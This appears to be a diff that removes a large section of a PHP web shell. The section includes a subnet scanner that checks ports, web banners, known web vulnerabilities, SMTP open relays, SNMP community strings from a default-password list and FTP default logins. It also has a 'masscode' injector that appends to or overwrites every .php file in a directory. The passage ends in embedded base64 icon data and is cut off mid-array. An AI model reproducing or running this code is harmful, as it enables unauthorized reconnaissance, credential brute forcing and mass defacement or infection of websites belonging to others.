-$f = substr($from,strrpos($from,".")+1);

-$from = substr($from,0,strrpos($from,"."));

-if(!empty($_REQUEST['httpscanner'])){

-echo "Loading webserver bug list...";

-flusheR();

-$buglist=whereistmP().DIRECTORY_SEPARATOR.namE();

-$dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist);

-if($dl){$file=file($buglist);echo "Done! scanning started.<br><br>";}else echo "Failed!!! scanning started without webserver security testing...<br><br>";

-flusheR();

-}else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to:<br><br>";}

-for($i=$f;$i<=$to;$i++){

-$output=0;

-$ip="$from.$i";

-if(!empty($_REQUEST['nslookup'])){

-$hn=gethostbyaddr($ip);

-if($hn!=$ip)echo "$ip [$hn]<br>";}

-flusheR();

-if(!empty($_REQUEST['ipscanner'])){

-$port=$_REQUEST['port'];

-if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port;

-$open=$ser="";

-foreach($p as $po){

-$scan=checkthisporT($ip,$po,$timeout);

-if ($scan){

-$ser="";

-if($ser=getservbyport($po,"tcp"))$ser="($ser)";

-$open.=" $po$ser ";

-}

-}

-if($open){echo "$ip) Open ports:$open<br>";$output=1;}

-flusheR();

-}

-if(!empty($_REQUEST['httpbanner'])){

-$res=get_sw_namE($ip,$timeout);

-if($res){

-echo "$ip) Webserver software: ";

-if($res==-1)echo "Unknow";

-else echo $res;

-echo "<br>";

-$output=1;

-}

-flusheR();

-}

-if(!empty($_REQUEST['httpscanner'])){

-if(checkthisporT($ip,80,$timeout) && !empty($file)){

-$admin=array('/admin/','/adm/');

-$users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www');

-$nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/');

-$cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/');

-foreach ($file as $v){

-$vuln=array();

-$v=trim($v);

-if(!$v || $v{0}=='#')continue;

-$v=str_replace('","','^',$v);

-$v=str_replace('"','',$v);

-$vuln=explode('^',$v);

-$page=$cqich=$nukech=$adminch=$userch=$vuln[1];

-if(strstr($page,'@CGIDIRS'))

-foreach($cgi as $cg){

-$cqich=str_replace('@CGIDIRS',$cg,$page);

-$url="http://$ip$cqich";

-$res=check_urL($url,$vuln[3],$vuln[2],$timeout);

-if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}

-flusheR();

-}

-elseif(strstr($page,'@ADMINDIRS'))

-foreach ($admin as $cg){

-$adminch=str_replace('@ADMINDIRS',$cg,$page);

-$url="http://$ip$adminch";

-$res=check_urL($url,$vuln[3],$vuln[2],$timeout);

-if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}

-flusheR();

-}

-elseif(strstr($page,'@USERS'))

-foreach ($users as $cg){

-$userch=str_replace('@USERS',$cg,$page);

-$url="http://$ip$userch";

-$res=check_urL($url,$vuln[3],$vuln[2],$timeout);

-if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}

-flusheR();

-}

-elseif(strstr($page,'@NUKE'))

-foreach ($nuke as $cg){

-$nukech=str_replace('@NUKE',$cg,$page);

-$url="http://$ip$nukech";

-$res=check_urL($url,$vuln[3],$vuln[2],$timeout);

-if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}

-flusheR();

-}

-else{

-$url="http://$ip$page";

-$res=check_urL($url,$vuln[3],$vuln[2],$timeout);

-if($res){$output=1;echo "$ip)".$vuln[4]." <a href=\"$url\" target=\"_blank\">$url</a><br>";}

-flusheR();

-}

-}

-}

-}

-if(!empty($_REQUEST['smtprelay'])){

-if(checkthisporT($ip,25,$timeout)){

-$res='';

-$res=checksmtP($ip,$timeout);

-if($res==1){echo "$ip) SMTP relay found.<br>";$output=1;}flusheR();

-}

-}

-if(!empty($_REQUEST['snmpscanner'])){

-if(checkthisporT($ip,161,$timeout,1)){

-$com=$_REQUEST['com'];

-$coms=$res="";

-if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;

-foreach ($c as $v){

-$ret=snmpchecK($ip,$v,$timeout);

-if($ret)$coms .=" $v ";

-}

-if ($coms!=""){echo "$ip) SNMP FOUND: $coms<br>";$output=1;}

-flusheR();

-}

-}

-if(!empty($_REQUEST['ftpscanner'])){

-if(checkthisporT($ip,21,$timeout)){

-$usps=explode(',',$_REQUEST['userpass']);

-foreach ($usps as $v){

-$user=substr($v,0,strpos($v,':'));

-$pass=substr($v,strpos($v,':')+1);

-if($pass=='[BLANK]')$pass='';

-$ftp=@ftp_connect($ip,21,$timeout);

-if ($ftp){

-if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) <a href=\"ftp://$ip\" target=\"_blank\">$ip</a> System type: ".ftp_systype($ftp)."<br>";}

-}

-flusheR();

-}

-}

-}

-if($output)echo "<hr size=1 noshade>";

-flusheR();

-}

-$time=time()-$start;

-echo "Done! ($time seconds)</font>";

-if(!empty($buglist))unlink($buglist);

-}

-else{

-$chbox=(extension_loaded('sockets'))?"<input type=checkbox name=tcp value=1 checked>TCP<input type=checkbox name=udp value=1 checked>UDP":"<input type=hidden name=tcp value=1>";

-echo "<center><br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\"><td>Port scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">Target:</td><td bgcolor=\"#808080\" width=80%><input name=target value=$host size=40></td></tr><tr><td bgcolor=\"#666666\" width=25%>From:</td><td bgcolor=\"#666666\" width=25%><input name=fromport type=text value=\"1\" size=5></td></tr><tr><td bgcolor=\"#808080\" width=25%>To:</td><td bgcolor=\"#808080\" width=25%><input name=toport type=text value=\"1024\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\">Timeout:</td><td bgcolor=\"#666666\"><input name=timeout type=text value=\"2\" size=5></td><tr><td width=\"25%\" bgcolor=\"#808080\">$chbox</td><td bgcolor=\"#808080\" align=\"right\">$hcwd<input type=submit class=buttons name=portscanner value=Scan></td></tr></form></table>";

-$host = substr($host,0,strrpos($host,"."));

-echo "<br><table border=0 cellpadding=0 cellspacing=0 style=\"border-collapse: collapse\" bordercolor=\"#282828\" bgcolor=\"#333333\" width=\"50%\"><tr><form method=\"POST\" name=security><td>security scanner:</td></tr><td width=\"25%\" bgcolor=\"#808080\">From:</td><td bgcolor=\"#808080\" width=80%><input name=from value=$host.1 size=40> <input type=checkbox value=1 style=\"border-width:1px;background-color:#808080;\" name=nslookup checked>NS lookup</td></tr><tr><td bgcolor=\"#666666\" width=25%>To:</td><td bgcolor=\"#666666\" width=25%>xxx.xxx.xxx.<input name=to type=text value=254 size=4>$hcwd</td></tr><tr><td width=\"25%\" bgcolor=\"#808080\">Timeout:</td><td bgcolor=\"#808080\"><input name=timeout type=text value=\"2\" size=5></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ipscanner value=1 checked onClick=\"document.security.port.disabled = !document.security.port.disabled;\" style=\"border-width:1px;background-color:#666666;\">Port scanner:</td><td bgcolor=\"#666666\"><input name=port type=text value=\"21,23,25,80,110,135,139,143,443,445,1433,3306,3389,8080,65301\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=httpbanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Get web banner</td><td bgcolor=\"#808080\"><input type=checkbox name=httpscanner value=1 checked style=\"border-width:1px;background-color:#808080;\">Webserver security scanning&nbsp;&nbsp;&nbsp;<input type=checkbox name=smtprelay value=1 checked style=\"border-width:1px;background-color:#808080;\">SMTP relay check</td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"><input type=checkbox name=ftpscanner value=1 checked onClick=\"document.security.userpass.disabled = !document.security.userpass.disabled;\" style=\"border-width:1px;background-color:#666666;\">FTP password:</td><td bgcolor=\"#666666\"><input name=userpass type=text value=\"anonymous:admin@nasa.gov,ftp:ftp,Administrator:[BLANK],guest:[BLANK]\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#808080\"><input type=checkbox name=snmpscanner value=1 onClick=\"document.security.com.disabled = !document.security.com.disabled;\" checked style=\"border-width:1px;background-color:#808080;\">SNMP:</td><td bgcolor=\"#808080\"><input name=com type=text value=\"public,private,secret,cisco,write,test,guest,ilmi,ILMI,password,all private,admin,all,system,monitor,agent,manager,OrigEquipMfr,default,tivoli,openview,community,snmp,snmpd,Secret C0de,security,rmon,rmon_admin,hp_admin,NoGaH$@!,agent_steal,freekevin,0392a0,cable-docsis,fubar,ANYCOM,Cisco router,xyzzy,c,cc,cascade,yellow,blue,internal,comcomcom,apc,TENmanUFactOryPOWER,proxy,core,regional\" size=60></td></tr><tr><td width=\"25%\" bgcolor=\"#666666\"></td><td bgcolor=\"#666666\" align=\"right\"><input type=submit class=buttons name=securityscanner value=Scan></td></tr></form></table></center><br><center>";

-}

-}

-

-if ($act == "masscode")

-{

-if(isset($_POST['dir']) &&

-    $_POST['dir'] != '' &&

-    isset($_POST['filetype']) &&

-    $_POST['filetype'] != '' &&

-    isset($_POST['mode']) &&

-    $_POST['mode'] != '' && 

-    isset($_POST['message']) &&

-    $_POST['message'] != '' 

-    )

-    {

-        $dir = $_POST['dir'];

-        $filetype = $_POST['filetype'];

-        $message = $_POST['message'];

-        

-        $mode = "a"; //default mode

-        

-        

-        // Modes Begin

-        

-        if($_POST['mode'] == 'Apender')

-        {

-            $mode = "a";

-        }

-        if($_POST['mode'] == 'Overwriter')

-        {

-            $mode = "w";

-        }

-        

-        if($handle = opendir($dir))

-        {

-            ?>

-            Overwritten Files :-

-            <ul style="padding: 5px;" >

-            <?php

-            while(($file = readdir($handle)) !== False)

-            {

-                if((preg_match("/$filetype".'$'.'/', $file , $matches) != 0) && (preg_match('/'.$file.'$/', $self , $matches) != 1))

-                {

-                    ?>

-                        <li class="file"><a href="<?php echo "$self?open=$dir$file"?>"><?php echo $file; ?></a></li>

-                    <?php

-                    echo "\n";

-                    $fd = fopen($dir.$file,$mode);

-                    if (!$fd) echo "<p><font color=red>Permission Denied</font></p>"; break;

-                    fwrite($fd,$message);

-                }

-            }

-            ?>

-            </ul>

-            <?php

-        }

-    }

-    else

-    {

-        ?>

-        <table >

-        

-            <form method='POST'>

-            <input type="hidden" name="injector"/>  

-                <tr>

-                    <td class="title">

-                        Directory

-                    </td>

-                    <td>

-                         <input name="dir" value="<?php echo getcwd().$SEPARATOR; ?>" />

-                    </td>

-                </tr>

-                <tr>

-                <td class="title">

-                    Mode

-                </td>

-                <td>

-                        <select style="width: 125px;" name="mode">

-                            <option value="Apender">Apender</option>

-                            <option value="Overwriter">Overwriter</option>

-                        </select>

-                </td>

-                </tr>

-                <tr>

-                    <td class="title">

-                        File Type

-                    </td>

-                    <td>

-                        <input type="text" class="cmd" name="filetype" value=".php" onblur="if(this.value=='')this.value='.php';" />

-                    </td>

-                </tr>

-                

-                

-                <tr>

-                    <td colspan="2">

-                        <textarea name="message" cols="110" rows="10" class="cmd">I cant forget the time, i was trying to learn all this stuff without some guidance ..</textarea>

-                    </td>

-                </tr>

-                

-                

-                <tr>

-                    <td rowspan="2">

-                        <input style="margin : 20px; margin-left: 315px; padding : 10px; width: 100px;" type="submit" value="Inject :D"/>

-                    </td>

-                </tr>

-        </form>

-        </table>

-        <?php

-    }

-}

-

-}

-else

-

-{

-

- @ob_clean();

-

- $images = array(

-

-"arrow_ltr"=>

-

-"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ".

-

-"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==",

-

-"back"=>

-

-"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".

-

-"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt".

-

-"Wg0JADs=",

-

-"buffer"=>

-

-"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo".

-

-"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD".

-

-"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==",

-

-"change"=>

-

-"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+".

-

-"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA".

-

-"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC".

-

-"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA".

-

-"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL".

-

-"zMshADs=",

-

-"delete"=>

-

-"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp".

-

-"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw".

-

-"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv".

-

-"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl".

-

-"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5".

-

-"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4".

-

-"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G".

-

-"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ".

-

-"jwVFHBgiEGQFIgQasYkcSbJQIAA7",

-

-"download"=>

-

-"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".

-

-"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",

-

-"forward"=>

-

-"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8".

-

-"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt".

-

-"WqsJADs=",

-

-"home"=>

-

-"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA".

-

-"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS".

-

-"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j".

-

-"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=",

-

-"mode"=>

-

-"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO".

-

-"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/".

-

-"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=",

-

-"refresh"=>

-

-"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA".

-

-"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY".

-

-"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ".

-

-"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=",

-

-"search"=>

-

-"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//".

-

-"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap".

-

-"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD".

-

-"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr".

-

-"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==",

-

-"setup"=>

-

-"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC".

-

-"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA".

-

-"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB".

-

-"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE".

-

-"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==",

-

-"small_dir"=>

-

-"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".

-

-"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",

-

-"small_unk"=>

-

-"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U".

-

-"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo".

-

-"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31".

-

-"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4".

-

-"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP".

-

-"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz".

-

-"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ".

-

-"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io".

-

-"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz".

-

-"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM".

-

-"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC".

-

-"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj".

-

-"yAsokBkQADs=",

-

-"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR".

-

-"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==",

-

-"sort_asc"=>

-

-"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMa".

-

-"SLrcPcE9GKUaQlQ5sN5PloFLJ35OoK6q5SYAOw==",

-

-"sort_desc"=>

-

-"R0lGODlhDgAJAKIAAAAAAP///9TQyICAgP///wAAAAAAAAAAACH5BAEAAAQALAAAAAAOAAkAAAMb".

-

-"SLrcOjBCB4UVITgyLt5ch2mgSJZDBi7p6hIJADs=",

-

-"sql_button_drop"=>

-

-"R0lGODlhCQALAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".

-

-"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".

-

-"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".

-

-"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".

-

-"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".

-

-"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".

-

-"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".

-

-"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".

-

-"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".

-

-"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".

-

-"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".

-

-"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".

-

-"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAsA".

-

-"AAg4AP8JREFQ4D+CCBOi4MawITeFCg/iQhEPxcSBlFCoQ5Fx4MSKv1BgRGGMo0iJFC2ehHjSoMt/".

-

-"AQEAOw==",

-

-"sql_button_empty"=>

-

-"R0lGODlhCQAKAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".

-

-"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".

-

-"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".

-

-"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".

-

-"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".

-

-"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".

-

-"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".

-

-"/5kAAJkAM5kAZpkAmZkAzJkA/5kzAJkzM5kzZpkzmZkzzJkz/5lmAJlmM5lmZplmmZlmzJlm/5mZ".

-

-"AJmZM5mZZpmZmZmZzJmZ/5nMAJnMM5nMZpnMmZnMzJnM/5n/AJn/M5n/Zpn/mZn/zJn//8wAAMwA".

-

-"M8wAZswAmcwAzMwA/8wzAMwzM8wzZswzmcwzzMwz/8xmAMxmM8xmZsxmmcxmzMxm/8yZAMyZM8yZ".

-

-"ZsyZmcyZzMyZ/8zMAMzMM8zMZszMmczMzMzM/8z/AMz/M8z/Zsz/mcz/zMz///8AAP8AM/8AZv8A".

-

-"mf8AzP8A//8zAP8zM/8zZv8zmf8zzP8z//9mAP9mM/9mZv9mmf9mzP9m//+ZAP+ZM/+ZZv+Zmf+Z".

-

-"zP+Z///MAP/MM//MZv/Mmf/MzP/M////AP//M///Zv//mf//zP///yH5BAEAABAALAAAAAAJAAoA".

-

-"AAgjAP8JREFQ4D+CCBOiMMhQocKDEBcujEiRosSBFjFenOhwYUAAOw==",

-

-"sql_button_insert"=>

-

-"R0lGODlhDQAMAPcAAAAAAIAAAACAAICAAAAAgIAAgACAgICAgMDAwP8AAAD/AP//AAAA//8A/wD/".

-

-"/////wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA".

-

-"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAMwAAZgAAmQAAzAAA/wAzAAAzMwAzZgAzmQAzzAAz/wBm".

-

-"AABmMwBmZgBmmQBmzABm/wCZAACZMwCZZgCZmQCZzACZ/wDMAADMMwDMZgDMmQDMzADM/wD/AAD/".

-

-"MwD/ZgD/mQD/zAD//zMAADMAMzMAZjMAmTMAzDMA/zMzADMzMzMzZjMzmTMzzDMz/zNmADNmMzNm".

-

-"ZjNmmTNmzDNm/zOZADOZMzOZZjOZmTOZzDOZ/zPMADPMMzPMZjPMmTPMzDPM/zP/ADP/MzP/ZjP/".

-

-"mTP/zDP//2YAAGYAM2YAZmYAmWYAzGYA/2YzAGYzM2YzZmYzmWYzzGYz/2ZmAGZmM2ZmZmZmmWZm".

-

-"zGZm/2aZAGaZM2aZZmaZmWaZzGaZ/2bMAGbMM2bMZmbMmWbMzGbM/2b/AGb/M2b/Zmb/mWb/zGb/".

-

